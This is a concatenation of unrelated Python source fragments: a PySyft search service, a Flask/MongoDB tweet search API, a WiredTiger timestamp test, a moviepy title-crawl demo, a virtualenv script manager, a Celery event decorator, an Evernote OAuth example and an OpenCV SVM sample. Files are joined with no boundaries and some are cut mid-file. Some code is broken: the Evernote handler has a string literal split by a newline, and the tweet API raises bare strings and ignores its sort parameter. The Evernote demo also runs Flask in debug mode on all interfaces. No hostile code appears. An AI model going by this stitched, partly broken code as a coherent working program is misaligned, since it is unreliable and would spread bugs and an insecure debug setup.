syft.core.common.message import ImmediateSyftMessageWithReply from syft.grid.messages.network_search_message import ( NetworkSearchMessage, NetworkSearchResponse, ) from ..exceptions import ( MissingRequestKeyError, InvalidParameterValueError, AuthorizationError, ) from ..database.utils import model_to_json from syft.grid.client.client import connect from syft.grid.client.grid_connection import GridHTTPConnection from syft.core.node.domain.client import DomainClient import requests import json class BroadcastSearchService(ImmediateNodeServiceWithReply): @staticmethod @service_auth(guests_welcome=True) def process( node: AbstractNode, msg: NetworkSearchMessage, verify_key: VerifyKey, ) -> NetworkSearchResponse: queries = set(msg.content.get("query", [])) associations = node.association_requests.associations() def filter_domains(url): datasets = json.loads(requests.get(url + "/data-centric/tensors").text) for dataset in datasets["tensors"]: if queries.issubset(set(dataset["tags"])): return True return False filtered_nodes = list(filter(lambda x: filter_domains(x.address), associations)) match_nodes = [node.address for node in filtered_nodes] return NetworkSearchResponse( address=msg.reply_to, status_code=200, content={"match-nodes": match_nodes} ) @staticmethod def message_handler_types() -> List[Type[ImmediateSyftMessageWithReply]]: return [NetworkSearchMessage] backend/app.py #!/usr/bin/env python3 import database import pymongo import os import datetime import json import dateparser from flask import Flask, make_response from flask_cors import CORS from flask_restful import Resource, Api, reqparse app = Flask(__name__) api = Api(app) db = database.get_client()["twitter"] CORS(app) @api.representation("application/json") def output_json(data, code, headers=None): def _clean(o): if isinstance(o, list): return [_clean(item) for item in o] if isinstance(o, dict): return {k: _clean(v) for k, v in o.items()} if isinstance(o, datetime.datetime): return o.__str__() return o resp = make_response(json.dumps(_clean(data)), code) resp.headers.extend(headers or {}) return resp class SearchResource(Resource): def get(self): parser = reqparse.RequestParser() # PARSE ARGUMENTS 
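        # Example of a request this parser accepts (values are hypothetical):
        #   GET /search?query=flood&language=en&min_likes=100&sort=dec_retweet_count&page=0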
# Page parser.add_argument("page", type=int, help="Page to display") # Archives parser.add_argument( "archive", type=str, action="append", help="Archive to include" ) # Languages parser.add_argument( "language", type=str, action="append", help="Language to include" ) # Content parser.add_argument("query", type=str, help="Text search query") # Date parser.add_argument( "min_time", type=dateparser.parse, help="Minimum publishing date" ) parser.add_argument( "max_time", type=dateparser.parse, help="Maximum publishing date" ) # Likes parser.add_argument("min_likes", type=int, help="Minimum likes") parser.add_argument("max_likes", type=int, help="Maximum likes") # Followers parser.add_argument("min_followers", type=int, help="Minimum followers") parser.add_argument("max_followers", type=int, help="Maximum followers") # Retweets parser.add_argument("min_retweets", type=int, help="Minimum retweets") parser.add_argument("max_retweets", type=int, help="Maximum retweets") # Hashtags parser.add_argument( "hashtag", type=str, action="append", help="Hashtag to include" ) # Account parser.add_argument( "account", type=str, action="append", help="Account to include" ) # Sorts (likes, retweets, quotes, followers, time published) def sort_field(s): if s[0:4] not in ["asc_", "dec_"]: raise "sort must start with + or -" if s[4:] not in [ "like_count", "retweet_count", "quote_count", "follower_count", "tweet_time", ]: raise "invalid sort field" return ( s[4:], pymongo.ASCENDING if s[0:4] == "asc_" else pymongo.DESCENDING, ) parser.add_argument( "sort", type=sort_field, help="Sort field (starts with asc_ or dec_)", default="dec_like_count", ) args = parser.parse_args() # PERFORM SEARCH params = {} if args["archive"] != None: params["_archive"] = {"$in": args["archive"]} if args["language"] != None: params["tweet_language"] = {"$in": args["language"]} if args["query"] != None: params["$text"] = {"$search": args["query"]} time_range = {} if args["min_time"] != None: time_range["$gte"] = args["min_time"] if args["max_time"] != None: time_range["$lte"] = args["max_time"] if time_range != {}: params["tweet_time"] = time_range like_range = {} if args["min_likes"] != None: like_range["$gte"] = args["min_likes"] if args["max_likes"] != None: like_range["$lte"] = args["max_likes"] if like_range != {}: params["like_count"] = like_range follower_range = {} if args["min_followers"] != None: follower_range["$gte"] = args["min_followers"] if args["max_followers"] != None: follower_range["$lte"] = args["max_followers"] if follower_range != {}: params["follower_count"] = follower_range retweet_range = {} if args["min_retweets"] != None: retweet_range["$gte"] = args["min_retweets"] if args["max_retweets"] != None: retweet_range["$lte"] = args["max_retweets"] if retweet_range != {}: params["retweet_count"] = retweet_range if args["hashtag"] != None: params["hashtags"] = {"$elemMatch": {"$in": args["hashtag"]}} if args["account"] != None: params["userid"] = {"$in": args["account"]} if type(args["sort"]) == str: args["sort"] = [args["sort"]] return { "total": db.tweets.count_documents(params), "results": list( db.tweets.find(params) .sort("like_count", -1) .skip((args["page"] or 0) * 25) .limit(25) ), "archives": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": "$_archive"}, {"$group": {"_id": "$_archive", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, "languages": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": 
"$tweet_language"}, {"$group": {"_id": "$tweet_language", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, "hashtags": { a["_id"]: a["count"] for a in db.tweets.aggregate( [ {"$match": params}, {"$unwind": "$hashtags"}, {"$group": {"_id": "$hashtags", "count": {"$sum": 1}}}, {"$sort": {"count": -1}}, {"$limit": 50}, ] ) }, } class StatsResource(Resource): def get(self): # total # of tweets # names & counts of each archive # last updated # eventually: aggregate stats (averages, etc) return { "total_tweets": db.tweets.estimated_document_count(), "archives": db.tweets.distinct("_archive"), "languages": [ lang for lang in db.tweets.distinct("tweet_language") if lang.strip() != "" ], } api.add_resource(StatsResource, "/") api.add_resource(SearchResource, "/search") @app.after_request def add_header(response): response.cache_control.max_age = 24*60*60 return response if __name__ == "__main__": app.run(debug=os.getenv("DEBUG", "False") == "True") from django.db import models class UserSettings(SkeletonU): user = models.ForeignKey(User) key = models.CharField(_('Key'), max_length=50, null=False, blank=False, db_index=True) value = models.CharField(_('Value'), max_length=50) __unicode__ = lambda self: u'%s = %s' % (self.key, self.value) #!/usr/bin/env python # # Public Domain 2014-present MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # test_timestamp19.py # Use the oldest timestamp in the metadata as the oldest timestamp on restart. 
import wttest from wtdataset import SimpleDataSet from wtscenario import make_scenarios class test_timestamp19(wttest.WiredTigerTestCase): conn_config = 'cache_size=50MB' format_values = [ ('integer-row', dict(key_format='i', value_format='S')), ('column', dict(key_format='r', value_format='S')), ('column-fix', dict(key_format='r', value_format='8t')), ] scenarios = make_scenarios(format_values) def updates(self, uri, value, ds, nrows, commit_ts): session = self.session cursor = session.open_cursor(uri) for i in range(1, nrows + 1): session.begin_transaction() cursor[ds.key(i)] = value session.commit_transaction('commit_timestamp=' + self.timestamp_str(commit_ts)) cursor.close() def test_timestamp(self): uri = "table:test_timestamp19" create_params = 'key_format={},value_format={}'.format(self.key_format, self.value_format) self.session.create(uri, create_params) ds = SimpleDataSet(self, uri, 0, key_format=self.key_format, value_format="S") ds.populate() nrows = 1000 if self.value_format == '8t': value_x = 120 # 'x' value_y = 121 # 'y' value_z = 122 # 'z' else: value_x = 'x' * 1000 value_y = 'y' * 1000 value_z = 'z' * 1000 # Set the oldest and stable timestamps to 10. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(10) + ', stable_timestamp=' + self.timestamp_str(10)) # Insert values with varying timestamps. self.updates(uri, value_x, ds, nrows, 20) self.updates(uri, value_y, ds, nrows, 30) self.updates(uri, value_z, ds, nrows, 40) # Perform a checkpoint. self.session.checkpoint('use_timestamp=true') # Move the oldest and stable timestamps to 40. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(40) + ', stable_timestamp=' + self.timestamp_str(40)) # Update values. self.updates(uri, value_z, ds, nrows, 50) self.updates(uri, value_x, ds, nrows, 60) self.updates(uri, value_y, ds, nrows, 70) # Perform a checkpoint. self.session.checkpoint('use_timestamp=true') # Close and reopen the connection. self.close_conn() self.conn = self.setUpConnectionOpen('.') self.session = self.setUpSessionOpen(self.conn) # The oldest timestamp on recovery is 40. Trying to set it earlier is a no-op. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(10)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=oldest_timestamp'), self.timestamp_str(40)) # Move the oldest and stable timestamps to 70. self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(70) + ', stable_timestamp=' + self.timestamp_str(70)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=oldest_timestamp'), self.timestamp_str(70)) self.assertTimestampsEqual(\ self.conn.query_timestamp('get=stable_timestamp'), self.timestamp_str(70)) if __name__ == '__main__': wttest.run() # -*- coding: utf-8 -*- r""" The package is mainly organized around two class hierarchies: the functions and the solvers. Instantiated functions represent convex functions to optimize. Instantiated solvers represent solving algorithms. The :func:`pyunlocbox.solvers.solve` solving function takes as parameters a solver object and some function objects to actually solve the optimization problem. See this function's documentation for a typical usage example. The :mod:`pyunlocbox` package is divided into the following modules: * :mod:`.functions`: objective functions to define an optimization problem, * :mod:`.solvers`: the main solving function and common solvers, * :mod:`.acceleration`: general acceleration schemes for various solvers, * :mod:`.operators`: some operators. 
""" # When importing the toolbox, you surely want these modules. from pyunlocbox import functions from pyunlocbox import solvers from pyunlocbox import operators from pyunlocbox import acceleration # Silence the code checker warning about unused symbols. assert functions assert solvers assert operators assert acceleration __version__ = '0.5.2' __release_date__ = '2017-12-15' # Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar. Consider U$1.00 = R$3.27. micro-fan/aiozk import asyncio import os import uuid from aiozk import ZKClient, exc # noqa from aiozk.states import States import pytest HOST = os.environ.get('ZK_HOST', 'zk') @pytest.fixture def servers(): return HOST def get_client(): return ZKClient(HOST, chroot='/test_aiozk') async def get_tree(client, curr='/'): out = [curr, ] children = await client.get_children(curr) for c in children: # eliminate double slash: //root = '/'.join('/', 'root') if curr == '/': curr = '' out.extend(await get_tree(client, '/'.join([curr, c]))) return out async def dump_tree(client, base='/'): out = list(await get_tree(client, base)) print(f'Tree dump: {out}') return out @pytest.fixture def path(): yield f'/{uuid.uuid4().hex}' @pytest.fixture async def zk(): c = get_client() await c.start() if len(await c.get_children('/')): await c.deleteall('') await c.create('') yield c try: await c.delete('/') except exc.NotEmpty: await dump_tree(c) await c.deleteall('') raise await c.close() @pytest.fixture async def zk2(): c = get_client() await c.start() yield c await c.close() @pytest.fixture def zk_disruptor(zk): """ Force zk reconnect """ async def _force_reconnect(): conn = zk.session.conn await asyncio.sleep(0.2) await zk.session.ensure_safe_state() await conn.close(1) lost = [States.SUSPENDED, States.LOST] await zk.session.state.wait_for(*lost) await zk.session.ensure_safe_state() yield _force_reconnect 0 """ Description of the video: Mimic of Star Wars' opening title. A text with a (false) perspective effect goes towards the end of space, on a background made of stars. Slight fading effect on the text. 
""" import numpy as np from moviepy.editor import * from moviepy.video.tools.drawing import color_gradient from skimage import transform as tf # RESOLUTION w = 720 h = w * 9 / 16 # 16/9 screen moviesize = w, h # THE RAW TEXT txt = "\n".join( [ "A long time ago, in a faraway galaxy,", "there lived a prince and a princess", "who had never seen the stars, for they", "lived deep underground.", "", "Many years before, the prince's", "grandfather had ventured out to the", "surface and had been burnt to ashes by", "solar winds.", "", "One day, as the princess was coding", "and the prince was shopping online, a", "meteor landed just a few megameters", "from the couple's flat.", ] ) # Add blanks txt = 10 * "\n" + txt + 10 * "\n" # CREATE THE TEXT IMAGE clip_txt = TextClip( txt, color="white", align="West", fontsize=25, font="Xolonium-Bold", method="label" ) # SCROLL THE TEXT IMAGE BY CROPPING A MOVING AREA txt_speed = 27 fl = lambda gf, t: gf(t)[int(txt_speed * t) : int(txt_speed * t) + h, :] moving_txt = clip_txt.fl(fl, apply_to=["mask"]) # ADD A VANISHING EFFECT ON THE TEXT WITH A GRADIENT MASK grad = color_gradient( moving_txt.size, p1=(0, 2 * h / 3), p2=(0, h / 4), col1=0.0, col2=1.0 ) gradmask = ImageClip(grad, ismask=True) fl = lambda pic: np.minimum(pic, gradmask.img) moving_txt.mask = moving_txt.mask.fl_image(fl) # WARP THE TEXT INTO A TRAPEZOID (PERSPECTIVE EFFECT) def trapzWarp(pic, cx, cy, ismask=False): """ Complicated function (will be latex packaged as a fx) """ Y, X = pic.shape[:2] src = np.array([[0, 0], [X, 0], [X, Y], [0, Y]]) dst = np.array([[cx * X, cy * Y], [(1 - cx) * X, cy * Y], [X, Y], [0, Y]]) tform = tf.ProjectiveTransform() tform.estimate(src, dst) im = tf.warp(pic, tform.inverse, output_shape=(Y, X)) return im if ismask else (im * 255).astype("uint8") fl_im = lambda pic: trapzWarp(pic, 0.2, 0.3) fl_mask = lambda pic: trapzWarp(pic, 0.2, 0.3, ismask=True) warped_txt = moving_txt.fl_image(fl_im) warped_txt.mask = warped_txt.mask.fl_image(fl_mask) # BACKGROUND IMAGE, DARKENED AT 60% stars = ImageClip("../../videos/stars.jpg") stars_darkened = stars.fl_image(lambda pic: (0.6 * pic).astype("int16")) # COMPOSE THE MOVIE final = CompositeVideoClip( [stars_darkened, warped_txt.set_pos(("center", "bottom"))], size=moviesize ) # WRITE TO A FILE final.set_duration(8).write_videofile("starworms.avi", fps=5) # This script is heavy (30s of computations to render 8s of video) """===================================================================== CODE FOR THE VIDEO TUTORIAL We will now code the video tutorial for this video. When you think about it, it is a code for a video explaining how to make another video using some code (this is so meta!). This code uses the variables of the previous code (it should be placed after that previous code to work). =====================================================================""" def annotate(clip, txt, txt_color="white", bg_color=(0, 0, 255)): """ Writes a text at the bottom of the clip. 
""" txtclip = TextClip(txt, fontsize=20, font="Ubuntu-bold", color=txt_color) txtclip = txtclip.on_color( (clip.w, txtclip.h + 6), color=(0, 0, 255), pos=(6, "center") ) cvc = CompositeVideoClip([clip, txtclip.set_pos((0, "bottom"))]) return cvc.set_duration(clip.duration) def resizeCenter(clip): return clip.resize(height=h).set_pos("center") def composeCenter(clip): return CompositeVideoClip([clip.set_pos("center")], size=moviesize) annotated_clips = [ annotate(clip, text) for clip, text in [ ( composeCenter(resizeCenter(stars)).subclip(0, 3), "This is a public domain picture of stars", ), ( CompositeVideoClip([stars], moviesize).subclip(0, 3), "We only keep one part.", ), ( CompositeVideoClip([stars_darkened], moviesize).subclip(0, 3), "We darken it a little.", ), ( composeCenter(resizeCenter(clip_txt)).subclip(0, 3), "We generate a text image.", ), ( composeCenter(moving_txt.set_mask(None)).subclip(6, 9), "We scroll the text by cropping a moving region of it.", ), ( composeCenter(gradmask.to_RGB()).subclip(0, 2), "We add this mask to the clip.", ), (composeCenter(moving_txt).subclip(6, 9), "Here is the result"), ( composeCenter(warped_txt).subclip(6, 9), "We now warp this clip in a trapezoid.", ), (final.subclip(6, 9), "We finally superimpose with the stars."), ] ] # Concatenate and write to a file concatenate_videoclips(annotated_clips).write_videofile("tutorial.avi", fps=5) #!/usr/bin/env python3 #deps: docopt pathlib """Manuscript. Manage your scripts and their dependencies. Just add a line of the form "#deps: requests docopt pathlib" to your script, and manuscript will install them in a virtualenv and create a wrapper. Usage: manuscript install SCRIPT [-e ENV -i INTERPRETER -c] manuscript check-deps Options: -e ENV The name of the virtualenv to use -i INTERPRETER Specify the interpreter to use, otherwise, it's guessed from the script's shebang. -c Copy the script so the original can be deleted """ import os import sys import subprocess import shutil from pathlib import Path from docopt import docopt MANUSCRIPT_DIR = Path(os.path.expanduser('~'), '.manuscript') ENVS_DIR = MANUSCRIPT_DIR / 'envs' BIN_DIR = MANUSCRIPT_DIR / 'bin' COPIES_DIR = MANUSCRIPT_DIR / 'script_copies' def initialize(): """Checks that everything that should exist exists""" subprocess.check_output(['virtualenv', '--version']) for path in (MANUSCRIPT_DIR, ENVS_DIR, BIN_DIR, COPIES_DIR): if not path.exists(): path.mkdir() class Env: """One of the virtualenv manipulated by manuscript""" def __init__(self, name): """Creates a virtualenv with the given name.""" self.name = name if name.startswith('workon:'): try: workon_dir = Path(os.environ['WORKON_HOME']) except KeyError: print("'WORKON_HOME' environment variable not found, cannot " "use virtualenv-wrapper env.") sys.exit(-1) self.dir = workon_dir / name[len('workon:'):] else: self.dir = ENVS_DIR / name def created(self): return self.dir.exists() def ensure_created(self, interpreter): """Ensures the env in created. 
If not, create it with interpreter""" if not self.created(): if self.name.startswith('workon:'): print('Cannot create virtualenv-wrapper env, please create it ' 'yourself with "mkvirtualenv {}"' .format(self.name[len('workon:'):])) sys.exit(-1) subprocess.check_call(['virtualenv', '-p', interpreter, str(self.dir)]) def bin_path(self, bin): """Returns the path to a bin in the env""" return self.dir / 'bin' / bin def install(self, pkgs): """Install the given packages in the env""" if pkgs: subprocess.check_call([str(self.bin_path('pip')), 'install'] + pkgs) def default_env(interpreter): """Returns the default env for an interpreter""" name = 'default-{}'.format(interpreter) env = Env(name) env.ensure_created(interpreter) return env SCRIPT_TEMPLATE = """#!/bin/sh INTERPRETER={} FILE={} $INTERPRETER $FILE $* """ class Script: """One of the scripts manipulated by manuscript""" def __init__(self, script, env, copy=False): """Creates a script attached to the given environment. If copy if True, first copy this script instead of just linking it""" self.path = Path(script).resolve() self.name = self.path.name self.env = env if copy: shutil.copy(str(self.path), str(COPIES_DIR)) print('Copied {} to {}'.format(self.path, COPIES_DIR)) self.path = COPIES_DIR / self.name if self.name.endswith('.py'): self.name = self.name[:-3] def dependencies(self): """Looks for dependencies of the form "#deps: ..." in the script""" with self.path.open() as f: for line in f: if line.startswith('#deps:'): line = line.replace('#deps:', '').strip() return line.split(' ') return [] def install_deps(self): """Install the dependencies of the script""" self.env.install(self.dependencies()) def save(self): """Save the script in manuscript's bin dir""" self.install_deps() file = BIN_DIR / self.name with file.open('w') as f: f.write(SCRIPT_TEMPLATE.format(self.env.bin_path('python'), repr(str(self.path)))) subprocess.check_call(['chmod', '+x', str(file)]) print('Created {}'.format(file)) def interpreter_from_shebang(script): """Tries to guess the interpreter to use from the shebang of the script. Returns None if none is found.""" with open(script) as f: line = next(f) if line.startswith('#!'): if 'env' in line: return line.strip().split('env ')[1] else: return line.strip().split('/')[-1] return None def script_without_specific_env(script_file, interpreter, copy): """Returns a Script created using a fefault interpreter, guess which if necessary""" interpreter = (interpreter or interpreter_from_shebang(script_file) or 'python') env = default_env(interpreter) return Script(script_file, env, copy) def all_scripts(): """Return all the scripts handled by manuscript""" for script in BIN_DIR.iterdir(): with script.open() as f: lines = f.readlines() env = Env(lines[1].split('/')[-3]) script = lines[2].split("'")[-2] yield Script(script, env) def main(): args = docopt(__doc__) initialize() if args['install']: if args['-e']: # A name is given env = Env(args['-e']) if not env.created(): interpreter = (args['-i'] or interpreter_from_shebang(args['SCRIPT']) or 'python') env.ensure_created(interpreter) elif args['-i']: print('Interpreted provided but env "{}" already ' 'exists. 
Ignored'.format(env.name)) script = Script(args['SCRIPT'], env, args['-c']) else: # No name, use default env script = script_without_specific_env(args['SCRIPT'], interpreter=args['-i'], copy=args['-c']) script.save() elif args['check-deps']: for script in all_scripts(): script.install_deps() if __name__ == '__main__': main() django_event/publisher/decorator.py # -*- coding: utf-8 -*- """ Core publisher client module. Basically you should use this decorator instead of manually write events into database. Decorator specifies some overridable methods if you need basic customization. Usage examples: Defining event task: :: @event(event_type='some_type', routing_strategy='') def some_task(event_request, event): argument = event_request.custom_argument return some_processed_data(event_request.data, event) And call: :: some_task.delay(EventRequest(django_request, custom_argument=123)) You can know more about .delay() or other methods in Celery docs. """ from __future__ import unicode_literals from functools import wraps from celery import task from celery import current_task from django.contrib.auth import get_user_model from django_event.publisher.exceptions import EventError class event(object): """ Main client publisher interface. Decorates function and return celery task. Automatically start and end event after celery started/completed the task. You must pass EventRequest into decorated function. :class:`EventRequest` can accept keyword arguments needed by wrapped function which are not required but django request are required by internal needs. This decorator automatically set :class:`EventRequest` and :class:`Event` instances as wrapped function arguments. Wrapped func may raise specific exception :class:`EventError` used to notify subscribers about failure. Basically this decorator will handle only that type of exceptions. Be sure you handle all raised exception in wrapped func otherwise it will pass outside decorator and into database as well. """ def __init__(self, event_type='', send_mail=False, progress_throttling=0.1, routing_strategy='', task_kwargs=None, on_start=lambda _event: None, on_success=lambda _event: None, on_error=lambda _event: None): """ :param event_type: Event type, using in message routing. :type event_type: :class:`str` :param send_mail: Send email after event is done. :type send_mail: :class:`bool` :param progress_throttling: Describes how often event will send progress messages. See :class:`Event` docs for more information about this parameter. :type progress_throttling: :class:`float` :param routing_strategy: Routing strategy e.g. what listeners will do with messages. Empty strategy means you want to deliver notification to all subscribed clients. See :class:`Event` docs for more information about this parameter. :type routing_strategy: :class:`str` :param task_kwargs: Celery task arguments. :type task_kwargs: :class:`dict` :param on_start: Event start callback. :type on_start: :class:`str` :param on_success: Event success callback. :type on_success: callable object :param on_error: Event error callback. 
:type on_error: callable object """ self._event_type = event_type self._send_mail = send_mail self._routing_strategy = routing_strategy self._progress_throttling = progress_throttling self._task_kwargs = task_kwargs or {} self._on_start = on_start self._on_success = on_success self._on_error = on_error self._user = None self._event_request = None self._event = None self._status = True self._result = None ############################################################################ # CORE METHODS ############################################################################ def create_event(self): """ Create event model with passing arguments. Basically you dont need to manually create event. """ from django_event.models import get_event_model event_model = get_event_model() self._event = event_model.create( progress_throttling=self._progress_throttling, routing_strategy=self._routing_strategy, user=self._user, type=self._event_type, send_mail=self._send_mail, task_id=current_task.request.id, task_name=current_task.name, event_request=self._event_request.serialize() ) self._event.save() def __call__(self, func): """ Wraps passed function into Celery :class:`Task`. :param func: Function to be wrapped. :type func: callable object :return: Celery task instance. :rtype: Celery :class:`Task` """ @task(**self._task_kwargs) @wraps(func) def wrapped(event_request): self._event_request = event_request self._user = get_user_model().objects.get( id=self._event_request.user_id) self._send_mail = self._event_request.send_mail and self._send_mail self.create_event() self.start_event() try: self._result = func(self._event_request, self._event) except EventError as e: self._result = e.message self._status = False self.complete_event() return self._result return wrapped ############################################################################ # OVERRIDABLE METHODS ############################################################################ def start_event(self): """ Starts event. Override this if you want to customize message. """ self._event.start(callback=self._on_start) def complete_event(self): """ Ends event. Override this if you want to customize message. 
""" self._event.complete( self._result, status=self._status, callback=self._on_success, errback=self._on_error )rdhyee/oauth-flask-examples # https://requests-oauthlib.readthedocs.org/en/latest/examples/real_world_example.html#real-example import os from flask import Flask, request, redirect, session, url_for from flask.json import jsonify # import hashlib # import binascii import evernote.edam.userstore.constants as UserStoreConstants # import evernote.edam.type.ttypes as Types from evernote.api.client import EvernoteClient EVERNOTE_CONSUMER_KEY = os.environ.get("EVERNOTE_CONSUMER_KEY") EVERNOTE_CONSUMER_SECRET = os.environ.get("EVERNOTE_CONSUMER_SECRET") EVERNOTE_PRODUCTION = os.environ.get("EVERNOTE_PRODUCTION", 'False') #default to sandbox EVERNOTE_DEV_AUTH_TOKEN = os.environ.get("EVERNOTE_DEV_AUTH_TOKEN", '') EVERNOTE_CALLBACK_URI = os.environ.get("EVERNOTE_CALLBACK_URI") SANDBOX = False if EVERNOTE_PRODUCTION == 'True' else True app = Flask(__name__) # Evernote key/secret BASE_URL = "https://www.evernote.com" if EVERNOTE_PRODUCTION == 'True' \ else "https://sandbox.evernote.com" request_token_url = '{}/oauth'.format(BASE_URL) authorization_base_url = '{}/OAuth.action'.format(BASE_URL) access_token_url = '{}/oauth'.format(BASE_URL) # https://github.com/evernote/evernote-sdk-python/blob/1.25.0/sample/django/oauth/views.py#L11 def get_evernote_client(token=None, sandbox=True): if token is not None: return EvernoteClient(token=token, sandbox=sandbox) else: return EvernoteClient( consumer_key=EVERNOTE_CONSUMER_KEY, consumer_secret=EVERNOTE_CONSUMER_SECRET, sandbox=sandbox ) @app.route("/") def demo(): """Step 1: User Authorization. Redirect the user/resource owner to the OAuth provider (i.e. Github) using an URL with a few key OAuth parameters. """ client = get_evernote_client(token=None, sandbox=SANDBOX) request_token = client.get_request_token(EVERNOTE_CALLBACK_URI) session['oauth_token'] = request_token['oauth_token'] session['oauth_token_secret'] = request_token['oauth_token_secret'] return redirect(client.get_authorize_url(request_token)) # Step 2: User authorization, this happens on the provider. @app.route("/callback", methods=["GET"]) def callback(): """ Step 3: Retrieving an access token. The user has been redirected back from the provider to your registered callback URL. With this redirection comes an authorization code included in the redirect URL. We will use that to obtain an access token. """ try: client = get_evernote_client(token=None, sandbox=SANDBOX) token = client.get_access_token( session['oauth_token'], session['oauth_token_secret'], request.args.get('oauth_verifier', '') ) session['token'] = token except Exception as e: return str(e) return redirect(url_for('.profile')) @app.route("/profile", methods=["GET"]) def profile(): """Fetching a protected resource using an OAuth 1 token. """ token = session['token'] client = get_evernote_client(token=token, sandbox=SANDBOX) user_store = client.get_user_store() version_ok = user_store.checkVersion( "Evernote EDAMTest (Python)", UserStoreConstants.EDAM_VERSION_MAJOR, UserStoreConstants.EDAM_VERSION_MINOR ) note_store = client.get_note_store() # List all of the notebooks in the user's account notebooks = note_store.listNotebooks() return "
" .join([notebook.name for notebook in notebooks]) if __name__ == "__main__": # This allows us to use a plain HTTP callback os.environ['DEBUG'] = "1" app.secret_key = os.urandom(24) app.run(host="0.0.0.0", port=5000, debug=True) vladiant/OpenCVMLsamples # https://github.com/methylDragon/opencv-python-reference/blob/master/04%20OpenCV%20Machine%20Learning%20and%20AI%20Detectors.md # Source: https://docs.opencv.org/3.4.4/d5/d26/tutorial_py_knn_understanding.html # help(cv.FUNCTION_YOU_NEED_HELP_WITH) import cv2 as cv import numpy as np SZ = 20 # Size bin_n = 16 # Number of bins affine_flags = cv.WARP_INVERSE_MAP | cv.INTER_LINEAR def deskew(img): m = cv.moments(img) if abs(m["mu02"]) < 1e-2: return img.copy() skew = m["mu11"] / m["mu02"] M = np.float32([[1, skew, -0.5 * SZ * skew], [0, 1, 0]]) img = cv.warpAffine(img, M, (SZ, SZ), flags=affine_flags) return img def hog(img): gx = cv.Sobel(img, cv.CV_32F, 1, 0) gy = cv.Sobel(img, cv.CV_32F, 0, 1) mag, ang = cv.cartToPolar(gx, gy) bins = np.int32(bin_n * ang / (2 * np.pi)) # quantizing binvalues in (0...16) bin_cells = bins[:10, :10], bins[10:, :10], bins[:10, 10:], bins[10:, 10:] mag_cells = mag[:10, :10], mag[10:, :10], mag[:10, 10:], mag[10:, 10:] hists = [ np.bincount(b.ravel(), m.ravel(), bin_n) for b, m in zip(bin_cells, mag_cells) ] hist = np.hstack(hists) # hist is a 64 bit vector return hist img = cv.imread("5000_digits.png", 0) if img is None: raise Exception("we need the 5000_digits.png image from samples/data here !") cells = [np.hsplit(row, 100) for row in np.vsplit(img, 50)] # First half is trainData, remaining is testData train_cells = [i[:50] for i in cells] test_cells = [i[50:] for i in cells] deskewed = [list(map(deskew, row)) for row in train_cells] hogdata = [list(map(hog, row)) for row in deskewed] trainData = np.float32(hogdata).reshape(-1, 64) responses = np.repeat(np.arange(10), 250)[:, np.newaxis] svm = cv.ml.SVM_create() svm.setKernel(cv.ml.SVM_LINEAR) svm.setType(cv.ml.SVM_C_SVC) svm.setC(2.67) svm.setGamma(5.383) svm.train(trainData, cv.ml.ROW_SAMPLE, responses) print("Save trained model data as svm_data.dat") svm.save("svm_data.dat") deskewed = [list(map(deskew, row)) for row in test_cells] hogdata = [list(map(hog, row)) for row in deskewed] testData = np.float32(hogdata).reshape(-1, bin_n * 4) result = svm.predict(testData)[1] mask = result == responses correct = np.count_nonzero(mask) accuracy = correct * 100.0 / result.size print(f"accuracy: {accuracy}") pbasting/cactussrc/cactus/preprocessor/allTests.py1-10 #!/usr/bin/env python #Copyright (C) 2011 by # #Released under the MIT license, see LICENSE.txt import unittest from cactus.preprocessor.lastzRepeatMasking.cactus_lastzRepeatMaskTest import TestCase as repeatMaskTest from cactus.preprocessor.cactus_preprocessorTest import TestCase as preprocessorTest def allSuites(): allTests = unittest.TestSuite((unittest.makeSuite(repeatMaskTest, 'test'), unittest.makeSuite(preprocessorTest, 'test'))) return allTests def main(): suite = allSuites() runner = unittest.TextTestRunner() i = runner.run(suite) return len(i.failures) + len(i.errors) if __name__ == '__main__': import sys sys.exit(main()) FunkyKoki/Separable-Batch-Normalization-for-Robust-Facial-Landmark-Localization cropSize = 128 # network input image size sigma = 1. # Gaussian blur param tau = 0.2 # salt and pepper Noise param eta = 0.4 # color jetting param gamma = 0.5 # occlusion param alpha = 0.15 # bounding box perturbation param theta = 25. 
